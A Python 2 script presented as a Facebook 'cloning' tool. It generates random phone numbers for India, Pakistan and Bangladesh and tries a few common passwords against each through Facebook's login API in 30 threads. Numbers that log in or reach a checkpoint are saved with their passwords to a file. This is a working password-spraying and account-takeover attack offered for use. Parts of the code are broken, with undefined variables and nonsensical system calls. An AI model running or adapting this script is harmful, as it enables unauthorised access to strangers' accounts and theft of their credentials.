# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(10000):

    nmbr = random.randint(111111, 999999)
    
    sys.stdout = open('.txt', 'a')

    print(nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('Then type: python2 boss')

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]

def keluar():
	print 'Thanks.'
	os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(3.0/300)
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;93mPlease Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)



back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"

os.system("clear")
logo1 = """
\033[1;92m _______  _______  _______ _________
\033[1;93m(  ____ \(  ___  )(       )\__   __/
\033[1;94m| (    \/| (   ) || () () |   ) (   
\033[1;93m| (_____ | |   | || || || |   | |   
\033[1;96m(_____  )| |   | || |(_)| |   | |   
\033[1;91m      ) || |   | || |   | |   | |   
\033[1;92m/\____) || (___) || )   ( |___) (___
\033[1;93m\_______)(_______)|/     \|\_______/

"""
logo2 = """
\033[1;91m═════════════════════════════════════════════
\033[1;97m✮✮INDIAN CLONING CODE✮✮
\033[1;91m═════════════════════════════════════════════
\033[1;95m║▶\033[1;93m905,975,755,855,954, 897, 967, 
\033[1;95m║▶\033[1;94m937, 700, 727, 965, 786, 874, 856, 
\033[1;95m║▶\033[1;96m566, 590, 527, 568, 578
\033[1;91m═════════════════════════════════════════════
\033[1;97m✮✮ PAKISTAN CLONING CODE✮✮
\033[1;91m═════════════════════════════════════════════
\033[1;95m║▶\033[1;93m 00 \033[1;92mTO \033[1;96m49
\033[1;91m═════════════════════════════════════════════
\033[1;97m✮✮BANGLADESH CLONING CODE✮✮
\033[1;91m═════════════════════════════════════════════
\033[1;95m║▶\033[1;96m175,165,191, 192, 193, 
\033[1;95m║▶\033[1;93m194, 195, 196, 197, 198, 199
\033[1;91m═════════════════════════════════════════════
"""
logo3 = """
\033[1;91m═════════════════════════════════════════════
\033[1;97m✪✪COUNTARY CODE✪✪
\033[1;91m═════════════════════════════════════════════
\033[1;96m[INDIA]\033[1;94m║▶\033[1;93m +91
\033[1;96m[PAKISTAN]\033[1;94m║▶\033[1;92m +92,\033[1;94m03
\033[1;96m[BANGLADESH]\033[1;94m║▶\033[1;95m +880
\033[1;91m═════════════════════════════════════════════

"""
logo4 = """
\033[1;91m═════════════════════════════════════════════
\033[1;97m[EXAMPLE]\033[1;94m║▶\033[1;96m786786,000786,12345,E.T.C
\033[1;91m═════════════════════════════════════════════
"""
jalan("\033[1;92m _______  _______  _______ _________")
jalan("\033[1;93m(  ____ \(  ___  )(       )\__   __/")
jalan("\033[1;94m| (    \/| (   ) || () () |   ) (   ")
jalan("\033[1;93m| (_____ | |   | || || || |   | |   ")
jalan("\033[1;96m(_____  )| |   | || |(_)| |   | |   ")
jalan("\033[1;91m      ) || |   | || |   | |   | |   ")
jalan("\033[1;92m/\____) || (___) || )   ( |___) (___")
jalan("\033[1;93m\_______)(_______)|/     \|\_______/")
print
print
jalan("\033[1;93m\033[1;47m\033[1;31m             WELCOME TO STAR BOY               \033[1;0m")

jalan("\033[1;96m             DEVOLPER SOMI AWAN")
jalan("\033[1;94m            WHATSAPP 03455453538")
jalan("\033[1;93m     WITHOUT LOGIN FACEBOOK CLONING SCRIPT")
jalan("\033[1;95m               DONT USE VPN")
jalan("\033[1;96m         WIFI AND INDIAN USER USE VPN")
jalan("\033[1;91m             TOOL UPDATE EVERYDAY")
jalan("\033[1;94m           TERMUX DATA CLEAR EVERYDAY")

print
user= raw_input("\033[1;92m[EN\033[1;91mTER]")
print
print
print
Username = "SOMI"

loop = 'true'
while (loop == 'true'):
    username = raw_input("\033[1;93m\033[1;47m\033[1;31m             ENTER TOOL USER NAME              \033[1;0m   \033[1;96m\n \n[\xe2\x97\x8f]ENTER  > ")
                                                                              
    if (username == Username):
    	
            print "\n\033[1;92m      [\xe2\x97\x8f] \033[1;97mCORRECT USERNAME\033[1;0m"
	    time.sleep(3)
            loop = 'false'
##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def login():
    os.system('clear')
    print logo1
    print 47* '\033[1;93m='
    print
    jalan('\x1b[1;91m[\x1b[1;92m1\x1b[1;96m]  \x1b[1;93mPAKISTANI CLONING    ')
    print
    jalan('\033[1;91m[\x1b[1;93m0\x1b[1;96m] \x1b[1;92mCLOSE')
    print
    print 47* '\033[1;93m='
    action()


def action():
    bch = raw_input('\n\n \x1b[1;96m>   ')
    if bch == '':
        print '[!] Fill in correctly'
        action()
    elif bch == '1':
        os.system("clear")
        print logo1
        print logo2
        try:
            c = raw_input("\033[1;97m>  ")
            print logo3
            k= raw_input("\033[1;97m>  ")
            idlist = ('.txt')
            for line in open(idlist,"r").readlines():
                id.append(line.strip())
        except IOError:
            print ("[!] File Not Found")
            raw_input("\n[ Back ]")
            somi()
    elif peak =='0':
        login()
    else:
        print '[!] Fill In Correctly'
        action()
    print logo4
    somi= raw_input('\033[1;93mENTER YOUR PASSWORD 1 :  ')
    somii = raw_input('\033[1;93mENTER YOUR PASSWORD 2 :  ')
    somiii = raw_input('\033[1;95mENTER YOUR PASSWORD 2 :  ')
    print 47* '\033[1;91m▬'
    xxx = str(len(id))
    jalan ('\033[1;96m➾ TOTAL IDS NUMBER : '+xxx)
    jalan ('\033[1;92m➾ CODE YOU CHOOSE: '+c)
    jalan ("\033[1;93m➾ PLEASE WAIT, PROCESS IS START ..")
    jalan ("\033[1;91m➾ TO STOP THIS PROCESS PRESS Ctrl THEN z")
    print 47* '\033[1;92m▬'
    print 
    def main(arg):
        global cpb,oks
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass 
        try:
            pass1 = somi
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;93m(Enjoy)    ' + k + c + user + '  |  ' + pass1                                       
                okb = open('save/cloned.txt', 'a')
                okb.write(k+c+user+pass1+'\n')
                okb.close()
                oks.append(c+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;97m┋ERROR┋   ' + k + c + user + '  |  ' + pass1
                    cps = open('save/cloned.txt', 'a')
                    cps.write(k+c+user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                else:
                    pass2 = somii
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;93m(Enjoy)    ' + k + c + user +  '  |  ' + pass2
                        okb = open('save/cloned.txt', 'a')
                        okb.write(k+c+user+pass2+'\n')
                        okb.close()
                        oks.append(c+user+pass2)
                    else:
                        if 'www.facebook.com' in q['error_msg']:
                            print '\033[1;97m┋ERROR┋   ' + k + c + user + '  |  ' + pass2
                            cps = open('save/cloned.txt', 'a')
                            cps.write(k+c+user+pass2+'\n')
                            cps.close()
                            cpb.append(c+user+pass2)
                        else:
                            pass3= somiii
                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                            q = json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;93m(Enjoy)    ' + k + c + user + '  |  ' + pass3
                                okb = open('save/cloned.txt', 'a')
                                okb.write(k+c+user+pass3+'\n')
                                okb.close()
                                oks.append(c+user+pass3)
                            else:
                                if 'www.facebook.com' in q['error_msg']:
                                    print '\033[1;97m┋ERROR┋   ' + k + c + user + '  |  ' + pass3 
                                    cps = open('save/cloned.txt', 'a')
                                    cps.write(k+c+user+pass3+'\n')
                                    cps.close()
                                    cpb.append(c+user+pass3)
                                


        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print 50* '\033[1;91m-'
    print 'Process Has Been Completed ...'
    print 'Total Online/Offline : '+str(len(oks))+'/'+str(len(cpb))
    print('Cloned Accounts Has Been Saved : save/cloned.txt')
    jalan("Note : Your Offline account Will Open after 10 to 20 days")
    print ''
    print """
 """
    
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
    login() 
          
if __name__ == '__main__':
    login()

